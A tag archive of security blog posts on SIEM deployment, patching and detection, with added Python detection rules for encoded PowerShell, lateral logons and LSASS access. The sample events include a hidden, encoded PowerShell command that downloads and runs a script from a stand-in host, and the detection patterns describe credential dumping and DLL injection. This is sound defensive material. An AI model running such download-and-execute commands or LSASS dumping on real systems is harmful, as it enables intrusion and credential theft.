Tag Archives: SIEM

IBM Webinar: Force the Bad Guys to Use Zero Day Exploits with Continuous Endpoint Enforcement and Patching

22 October 2016

On Tuesday, I watched the IBM webinar ‘Force the Bad Guys to Use Zero Day Exploits with Continuous Endpoint Enforcement and Patching’.

On slide 3 one could read the really interesting statement ‘NSA: no zero days were used in any high profile breaches over last 24 months’.

Slide 3 - Force the Bad Guys to Use Zero Day Exploits — and Why That’s a Good Thing

Curtis Dukes, deputy national manager of security systems within the NSA, said that the NSA has been involved in incident response or mitigation efforts for all ‘high profile incidents’ one has read about in the Washington Post or the New York Times.

In all these incidents the attackers used fairly simple techniques such as spear phishing, watering-hole attacks and USB-drive delivery to get onto the victims’ networks.

In the last 24 months, not one zero day has been used in these high profile intrusions.

That is a very interesting insight. Moreover, Curtis Dukes said that

The fundamental problem we faced in every one of those incidents was poor cyber hygiene.

The central idea of the webinar is to harden all systems by applying, at a minimum, all available patches for known vulnerabilities, and to do so in a timely manner. For most organizations this is a major challenge: applying an endless stream of operating system and application patches to thousands of servers and endpoints is a never-ending nightmare. It is essential nevertheless, because it hinders an attacker who has already gained a foothold on the network from moving laterally across it.

If an attacker cannot exploit existing vulnerabilities, he is forced to bring his own tooling, e.g. to download hacking tools from his C&C server. This increases the likelihood of detection, because the download, the dropped files and the new processes are anomalies that a current anti-malware solution or a well-tuned SIEM system can detect.

It is important to recognize that cyber hygiene must not be restricted to patching and password rules. Operating systems offer lots of powerful built-in tools, e.g. PowerShell, which an attacker can use to move laterally across the network without bringing any tools of his own. Such movements are much harder to detect, because they look very similar to legitimate administrative activity. Pass-the-hash attacks are another example where patching is of limited value only, because they abuse the authentication protocol as designed rather than a software bug.
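
The PowerShell case is the one where patch-level hygiene helps least, so detection has to look at how the tool is used. As an added example, not part of the original post, the following Python decodes the -EncodedCommand argument that most PowerShell-based tooling passes on the command line (base64 over UTF-16LE) and flags download cradles, Invoke-Expression, remote execution and console-hiding switches. The events, host names, user names and the 192.0.2.10 address are constructed; the indicator list is a starting point, not a complete ruleset.

```python
"""Decode PowerShell -EncodedCommand payloads found in process-creation events and flag
living-off-the-land indicators. Added example: the records below are constructed, laid out
like Windows 4688 / Sysmon 1 fields (Computer, SubjectUserName, CommandLine), not real telemetry."""
import base64
import binascii
import re

# Patterns applied to the decoded script text.
SCRIPT_INDICATORS = {
    "download cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "dynamic execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "remote execution": re.compile(r"Invoke-Command|Enter-PSSession|New-PSSession|-ComputerName", re.I),
    "nested encoding": re.compile(r"FromBase64String", re.I),
}
# Patterns applied to the raw command line: switches that hide the console and skip profiles.
CMDLINE_INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
}


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded(cmdline: str):
    """Return the base64 payload that follows an EncodedCommand switch, or None.
    PowerShell accepts any unambiguous prefix of a parameter name (-e, -ec, -enc, ...),
    so every switch that is a prefix of 'encodedcommand' is treated as that switch."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            return tokens[i + 1].strip("\"'")
    return None


def decode_ps(payload: str):
    """Decode base64 + UTF-16LE; None if the payload is not a valid encoded command."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(event: dict) -> dict:
    """Return the decoded script (if any) and the names of all matched indicators."""
    cmdline = event["CommandLine"]
    indicators = [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(cmdline)]
    decoded = None
    payload = extract_encoded(cmdline)
    if payload is not None:
        decoded = decode_ps(payload)
        if decoded is None:
            indicators.append("undecodable encoded command")
        else:
            indicators += [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(decoded)]
    return {"host": event["Computer"], "user": event["SubjectUserName"],
            "decoded": decoded, "indicators": indicators}


def triage(events):
    """Keep only events with at least one indicator, the ones with most indicators first."""
    hits = [h for h in (analyze(e) for e in events) if h["indicators"]]
    return sorted(hits, key=lambda h: len(h["indicators"]), reverse=True)


# Constructed sample events: two legitimate uses (a scheduled script, a monitoring agent that
# happens to use -EncodedCommand) and two attacker uses (download cradle, remote execution).
SAMPLE_EVENTS = [
    {"Computer": "SRV01", "SubjectUserName": "backup_svc",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"Computer": "SRV02", "SubjectUserName": "monitor_svc",
     "CommandLine": "powershell.exe -NonInteractive -EncodedCommand "
                    + encode_ps("Get-Service | Where-Object Status -eq 'Stopped'")},
    {"Computer": "SRV03", "SubjectUserName": "jdoe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')")},
    {"Computer": "SRV03", "SubjectUserName": "jdoe",
     "CommandLine": "powershell.exe -e "
                    + encode_ps("Invoke-Command -ComputerName SRV07 -ScriptBlock { whoami }")},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['host']} {hit['user']}: {', '.join(hit['indicators'])}")
        print(f"    decoded: {hit['decoded']}")
```

Two of the four constructed events use -EncodedCommand, but only one of them is flagged: encoding by itself is common in legitimate automation, so the rule scores the decoded content and the surrounding switches rather than the mere presence of encoding. A check like this needs command lines in the event stream, i.e. process-creation auditing with command-line logging (or Sysmon) enabled on the servers.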

It is very important to understand which threats a security solution mitigates. But it is of crucial importance to know its gaps and to have an idea of how to deal with them effectively.

Have a good weekend.

A SIEM Security Nightmare

18 September 2016

A few weeks ago, we started a small project to attach a production site to the central SIEM system.

Operational technology (OT) groups, which run the production IT systems, are traditionally not very happy when it comes to close collaboration with the Information Technology (IT) groups that run the ‘office’ IT systems. OT groups are always afraid of negative effects of office IT systems and procedures on the availability and safety of the production facilities.

Thus we started with a minimally invasive approach. Our goal was to keep the impact of the local SIEM components on the production Active Directory, systems and firewalls to a minimum.

The result was remarkable: within a few days we attached some Windows systems, switches and firewalls to the central SIEM system. No technical users were created in the production Active Directory, and only 3 ports were opened on the firewall for a point-to-point connection from the local SIEM component to the central system. More importantly, no reboot of any system was required! The OT group was positively impressed.

Unfortunately, to keep the local SIEM software up to date, patches must be applied 6 to 8 times a year. Patching always requires a fresh installation and configuration of the local SIEM components. This will keep the OT groups busy, in particular at large production sites with many network partitions.

To reduce this effort, a management system can be set up which automates the local installation and configuration of the SIEM software components. But to operate the management system, we have to open additional firewall ports for communication from outside the production network to SIEM components in all network partitions inside the production network. This invalidates our network security concept. In the worst case, attackers can use these connections to reach the production systems from the office network.

SIEM is starting to become a security nightmare for the OT groups, even though it would be quite simple for the vendor of the SIEM software to turn this into a really smart and secure process:

  • Change the software patching process so that the configuration of the local SIEM components is retained
  • Introduce an offline management mode, e.g. allow predefined configurations to be applied without a live connection from outside the production network

With this, the impact of the SIEM software on the production network is minimized and the overall security level is retained. Unfortunately, vendors of security software are often not interested in the overall security level …

Have a good weekend.

A risk-based approach to SIEM rollout hardly makes sense

25 July 2015

I had a lot of discussions about SIEM rollout in the past weeks. One approach is to watch only Windows server systems that store business-critical information or provide critical infrastructure services. Why should we waste time and effort on information that is not critical for the business? That sounds convincing, in particular with a risk-based approach in mind.

My approach goes far beyond this. I strongly recommend watching all Windows server systems through SIEM.

The reason is quite simple: in a Windows server network, lots of user accounts and technical accounts are used for administrative tasks. In general, these accounts are defined globally (in Active Directory) and are members of the individual servers’ local administrators group. And, in general, the same accounts are used on all systems, including those storing business-critical information.

If one assumes that about 10% of a company’s servers hold business-critical information, hacking attempts against the other 90% remain undetected. An attacker who hijacks one of the non-critical systems and runs a DLL injection attack against the Windows Local Security Authority Subsystem Service (lsass.exe) to extract plain-text passwords or password hashes of the shared administrative accounts from memory will have access to all of your systems within minutes.

But if you watch all servers through your SIEM system, you get a security incident within seconds after the attempt takes place. With well-defined security-incident processes in place you may be able to prevent the worst.
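
The correlation rule this argument calls for, as an added example that is not part of the original post: a shared privileged account authenticating to several distinct servers from one source address within a few minutes. The Python below runs the rule over constructed 4624 logon records twice, once with all servers reporting and once with only the two servers a risk-based rollout would have classified as critical. Account names, host names, addresses, the window and the host threshold are assumptions for the example.

```python
"""Correlation rule: a privileged account reaching many distinct servers from one source
within a short window, and what the rule sees when only the "critical" servers report
to the SIEM. Added example; the 4624 logon records are constructed, not real telemetry."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumptions for this example: which accounts count as privileged and which servers
# a risk-based rollout would classify as business-critical.
PRIVILEGED_ACCOUNTS = {"CORP\\srvadmin", "CORP\\backup_adm"}
CRITICAL_SERVERS = {"DB01", "FS01"}
MIN_DISTINCT_HOSTS = 3
WINDOW = timedelta(minutes=10)


def feed(events, reporting_hosts=None):
    """What the SIEM receives: every event, or only those from the servers that report."""
    if reporting_hosts is None:
        return list(events)
    return [e for e in events if e["Computer"] in reporting_hosts]


def fanout_alerts(events, min_hosts=MIN_DISTINCT_HOSTS, window=WINDOW):
    """Alert once per (account, source IP) when network (type 3) or RDP (type 10) logons of a
    privileged account reach >= min_hosts distinct servers within `window`."""
    groups = defaultdict(list)
    for e in events:
        if e["EventID"] == 4624 and e["LogonType"] in (3, 10) \
                and e["TargetUserName"] in PRIVILEGED_ACCOUNTS:
            groups[(e["TargetUserName"], e["IpAddress"])].append(e)

    alerts = []
    for (account, source), logons in groups.items():
        logons.sort(key=lambda e: e["TimeCreated"])
        for i, first in enumerate(logons):
            t0 = datetime.fromisoformat(first["TimeCreated"])
            hosts = []
            for e in logons[i:]:
                if datetime.fromisoformat(e["TimeCreated"]) - t0 > window:
                    break
                if e["Computer"] not in hosts:
                    hosts.append(e["Computer"])
            if len(hosts) >= min_hosts:
                alerts.append({"account": account, "source": source,
                               "hosts": hosts, "first_seen": first["TimeCreated"]})
                break  # one alert per group is enough; the analyst gets the full host list
    return alerts


def logon(ts, host, account, src, logon_type=3):
    """Build one constructed 4624 record."""
    return {"EventID": 4624, "TimeCreated": ts, "Computer": host,
            "TargetUserName": account, "IpAddress": src, "LogonType": logon_type}


# Constructed day: an admin does routine work from the jump host 10.1.1.5, an ordinary user
# browses file shares, and an attacker who has taken over WEB03 (10.1.20.33) reuses the
# shared server-admin account against four servers, the last of them critical.
SAMPLE_EVENTS = [
    logon("2015-07-20T08:00:00", "FS01", "CORP\\srvadmin", "10.1.1.5", 10),
    logon("2015-07-20T08:02:00", "DB01", "CORP\\srvadmin", "10.1.1.5", 10),
    logon("2015-07-20T08:30:00", "FS01", "CORP\\jdoe", "10.1.30.7"),
    logon("2015-07-20T08:31:00", "WEB04", "CORP\\jdoe", "10.1.30.7"),
    logon("2015-07-20T08:32:00", "APP02", "CORP\\jdoe", "10.1.30.7"),
    logon("2015-07-20T09:10:00", "WEB04", "CORP\\srvadmin", "10.1.20.33"),
    logon("2015-07-20T09:11:00", "WEB05", "CORP\\srvadmin", "10.1.20.33"),
    logon("2015-07-20T09:12:00", "APP02", "CORP\\srvadmin", "10.1.20.33"),
    logon("2015-07-20T09:14:00", "DB01", "CORP\\srvadmin", "10.1.20.33"),
]

if __name__ == "__main__":
    print("all servers reporting: ", fanout_alerts(feed(SAMPLE_EVENTS)))
    print("critical servers only: ", fanout_alerts(feed(SAMPLE_EVENTS, CRITICAL_SERVERS)))
```

With the full feed the rule fires on the attacker’s fan-out from 10.1.20.33 and names all four servers; with the critical-only feed it sees a single logon to DB01, which is indistinguishable from routine administration. The threshold and window need tuning against real administration patterns (jump hosts, deployment tools), otherwise the rule produces noise during maintenance windows.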

This reminds me of the report ‘Dissecting the Top Five Network Attack Methods: A Thief’s Perspective’ I read this week:

I love breaching a company that spends tons of money on gear but can’t get it working together. I know I leave traces, but by the time the admins connect all the dots, I’m long gone.

In the case above the admins do not even get the chance to connect the dots, because they are almost blind.

Have a good weekend!

To be successful a SIEM implementation should follow the ISO 27001 approach

20 July 2015

Last Wednesday I participated in a workshop on Production IT Security in Frankfurt. The presentations about security assessments, SIEM solutions, next generation firewalls and threat intelligence were very interesting, but, as always, I got the most valuable information from the discussions with the other attendees during the coffee breaks. It was really amazing to hear that the attendees, although they came from different companies, talked about the same, mostly negative, experiences in their SIEM projects.

During my ride back to Leverkusen I had time to think about this. Expectation management was a big issue in the discussions. The vendors’ PowerPoints suggest a quick and easy installation and start-up, and that after a few days of training in Big Data methods the SIEM operator can set up dashboards that show the current security status of your company. Far from it!

The key capabilities of a SIEM solution are:

(1) Data aggregation and correlation: Collect event data from various sources, correlate them, and integrate them with other information sources to turn the data into useful information.

(2) Compliance: Gather compliance data to support security, governance and auditing processes.

(3) Retention and Forensic analysis: Long term storage of historical event data for correlation over time and forensic analysis in the case of a security incident.

(4) Dashboard: Turn aggregated and correlated data into informational charts to aid security staff in identifying abnormal usage patterns.

(5) Alerting: Automated analysis of correlated events and production of alerts, to notify recipients of immediate issues.

Implementing each of these functions requires a big effort in preparation and operation. Let me show this by means of two examples:

(4) Dashboard. In order to find abnormal usage patterns you have to define normal usage patterns first. This takes not only time: it is really hard to find relevant patterns in the ocean of events that systems create during normal operation. To ensure a fast start-up you have to clean your systems of noise, e.g. event errors created by mis-configured services, before you start operation; otherwise that noise becomes part of your definition of ‘normal’.
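
What ‘define normal usage patterns first’ means in practice, as an added example that is not part of the original post: a per-host baseline of hourly event counts and a threshold derived from it. The Python below does this for failed logons (Event ID 4625) with constructed counts; one host is healthy, one carries a mis-configured service account that fails to log on all day. The thresholds and all numbers are assumptions for the example.

```python
"""Baseline check for one SIEM dashboard metric: hourly counts of Event ID 4625 (failed logon)
per host. Added example; all counts are constructed to show why noise from a mis-configured
service must be removed before the baseline is taken."""
from statistics import mean, stdev

MIN_COUNT = 10   # below this absolute count a deviation is not worth an analyst's time
SIGMA = 3.0      # how many standard deviations above the mean counts as abnormal


def threshold(baseline_hours, sigma=SIGMA):
    """Upper bound of 'normal' derived from the hourly counts of the baseline period."""
    if len(baseline_hours) < 2:
        raise ValueError("baseline needs at least two hourly samples")
    return mean(baseline_hours) + sigma * stdev(baseline_hours)


def is_abnormal(baseline_hours, current_count, min_count=MIN_COUNT, sigma=SIGMA):
    """True if the current hour exceeds both the absolute floor and the statistical threshold."""
    return current_count >= min_count and current_count > threshold(baseline_hours, sigma)


# Constructed hourly 4625 counts from the baseline period.
CLEAN_HOURS = [1, 2, 0, 3, 1, 2, 1, 0, 2, 1, 3, 2]   # a healthy member server
# The same event on a host where a service account with an expired password retries all day.
NOISY_HOURS = [180, 240, 210, 195, 260, 170, 230, 205, 250, 185, 220, 240]
SPRAY = 60  # failed logons that one hour of password spraying adds on top of normal activity


def scenario():
    """The same attack hour against both hosts; only the clean baseline exposes it."""
    return {
        "clean host": {"threshold": round(threshold(CLEAN_HOURS), 1), "current": 2 + SPRAY,
                       "abnormal": is_abnormal(CLEAN_HOURS, 2 + SPRAY)},
        "noisy host": {"threshold": round(threshold(NOISY_HOURS), 1), "current": 215 + SPRAY,
                       "abnormal": is_abnormal(NOISY_HOURS, 215 + SPRAY)},
    }


if __name__ == "__main__":
    for host, result in scenario().items():
        print(f"{host}: current={result['current']} threshold={result['threshold']} "
              f"abnormal={result['abnormal']}")
```

The same hour of password spraying (60 extra failed logons) is flagged on the clean host and disappears on the noisy one, because the retries of the mis-configured service have inflated both the mean and the standard deviation of its baseline. Fix the service first, let the baseline be rebuilt, and only then rely on the dashboard.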

(5) Alerting is probably the most interesting capability of a SIEM system. It allows you to act directly upon security incidents. To get the most out of alerting you have to set up an incident response process, ideally driven by the classification of the information assets, to avoid wasting time and effort.

This requires that all assets are listed in an asset repository, classified, and assigned to an asset owner before your SIEM solution goes into production.

In addition, your SIEM operations group must be sufficiently staffed, and the operators must be well-trained and authorized to take proper action on an incident, e.g. alerting your server operators or shutting down a server to prevent larger damage.

This sounds like the preparations required for the implementation of an Information Security Management System (ISMS) according to ISO 27001.

So my advice is: for a successful and quick SIEM implementation, follow the major steps of an ISMS implementation.

Bonne semaine!

A mere detection strategy will fail in the defense against cyber-attacks. Just like a mere prevention strategy.

10 May 2015

The article ‘Falling Off the End of the Cyber Kill Chain’, published by Anup Ghosh, Founder and CEO of Invincea, in the May edition of The Cyber Intelligencer, is worth reading and commenting on.

For years now, detection has been praised by all cyber defense experts and system vendors as the spearhead of the defense against cyber-attacks. Gartner security analyst Neil MacDonald puts it succinctly in his tweet: ‘Prevent you may, Detect you must!’

Just set up a SIEM system and record every event from every server, database, firewall, application server, network device, etc. With big data methods your data scientists will find every small hint of a cyber-attack in this universe of data, in the best case only some minutes after the attack happened, in the worst case some months later or never. In the meantime the attackers will quietly copy your intellectual property.

A mere detection strategy in the defense of cyber-attacks is doomed to failure, just like a mere prevention strategy.

Just a short example. Let us assume that your Windows Server 2012 member servers are well protected, with the latest security features configured and the latest patches installed. One of your administrators falls victim to a phishing attack. The attacker steals the password of the administrator account for one of your member servers and signs in to the system. He then attaches a debugger to the LSASS process to read password hashes or plain-text passwords from its memory, or runs a DLL injection attack against the LSASS process.

Both activities leave traces in the event log of the member server. Both are strong hints of a cyber-attack and must be investigated immediately. But it is very likely that these events are never investigated, because no one checks the logs in time.

But if your SIEM system regularly collects the critical events from your member servers, the attack is detected within minutes and proper measures can be taken.
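
The two LSASS scenarios in this post, and the credential-dumping case in the earlier post on risk-based SIEM rollout (25 July 2015), come down to one observable: a process other than the usual system components opens a handle on lsass.exe with memory-read rights, or with memory-write plus thread-creation rights. As an added example that is not part of the original post, the Python below classifies process-access records of the kind Sysmon Event ID 10 produces. The records, the allowlist and the call traces are constructed; the access-right constants are the Win32 values from winnt.h.

```python
"""Detection of suspicious handles opened on lsass.exe, the Windows Local Security Authority
Subsystem Service that holds credential material in memory. Added example; the records
mimic Sysmon Event ID 10 (ProcessAccess) fields but are constructed, not captured."""

# Process access rights from winnt.h (subset relevant here).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Reading LSASS memory is what a credential dumper needs; writing memory plus creating a
# thread is what classic DLL injection needs.
DUMP_RIGHTS = PROCESS_VM_READ
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

LSASS = r"c:\windows\system32\lsass.exe"

# Assumption: a starting allowlist of system processes that open lsass on a member server.
# This must be tuned per environment (AV/EDR agents, backup software) before going live.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
}


def classify(event: dict):
    """Return an alert dict for a suspicious lsass access, or None."""
    if event["TargetImage"].lower() != LSASS:
        return None
    source = event["SourceImage"].lower()
    if source in ALLOWLIST:
        return None
    granted = int(event["GrantedAccess"], 16)
    reasons = []
    if granted & INJECT_RIGHTS == INJECT_RIGHTS:
        reasons.append("write+thread access (DLL injection capable)")
    elif granted & DUMP_RIGHTS:
        reasons.append("memory read (credential dumping capable)")
    # Sysmon prints UNKNOWN for return addresses that belong to no loaded module,
    # which is typical for shellcode or reflectively loaded code.
    if "UNKNOWN" in event.get("CallTrace", "").upper():
        reasons.append("call trace through unbacked memory")
    if not reasons:
        return None
    return {"host": event["Computer"], "source": event["SourceImage"],
            "granted": hex(granted), "reasons": reasons}


def triage(events):
    """Alerts for all suspicious records, in input order."""
    return [alert for alert in map(classify, events) if alert]


# Constructed sample: two benign accesses (query-only rights), a mimikatz-style read,
# an injector whose call trace runs through unbacked memory, and procdump with full access.
SAMPLE_EVENTS = [
    {"Computer": "SRV11", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400", "CallTrace": ""},
    {"Computer": "SRV11", "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400", "CallTrace": ""},
    {"Computer": "SRV11", "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2c77e"},
    {"Computer": "SRV12", "SourceImage": r"C:\Windows\Temp\inj.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x143A",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4a4|UNKNOWN(000001F3A2B40C10)"},
    {"Computer": "SRV12", "SourceImage": r"C:\Tools\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF", "CallTrace": ""},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["host"], alert["source"], alert["granted"], "; ".join(alert["reasons"]))
```

Debugging LSASS to read its memory and injecting a DLL into it both need a handle with these rights, so a rule on GrantedAccess catches both regardless of the tool used, while the query-only handle of a task manager stays silent. Without Sysmon, ‘Audit Sensitive Privilege Use’ still records the use of SeDebugPrivilege (Event ID 4673) together with the calling process, but not which process was opened, so the Sysmon-style field set is what makes the rule precise.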

In my opinion a successful defense strategy requires a finely balanced mixture of detection and prevention. SIEM comes into play when all other protection measures have failed. It should be neither the first nor the sole line of defense.

Take care!